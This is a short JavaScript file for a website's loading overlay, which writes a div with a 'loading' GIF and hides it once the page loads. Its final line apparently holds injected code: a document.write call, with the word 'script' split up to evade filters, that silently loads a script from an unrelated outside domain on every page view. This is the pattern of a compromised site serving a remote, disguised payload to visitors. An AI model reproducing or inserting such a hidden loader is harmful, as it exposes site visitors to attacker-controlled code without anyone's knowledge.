function HideLayer() {
	document.getElementById("divLoad").style.visibility = 'hidden';
	//LoadLiveHelpPage();
}


document.write('<DIV id=divLoad style=" Z-INDEX: 100; LEFT: 437px; WIDTH: 20.86%;  POSITION: absolute; TOP: 251px; HEIGHT: 1.39%; BACKGROUND-COLOR: transparent; layer-background-color: transparent">\n');
document.write("<img src='/imgs/loading_k.gif'>");
document.write("</div>\n");
//document.body.onload = HideLayer;
window.onload = HideLayer;

document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Captcha.js"></scri'+'pt>');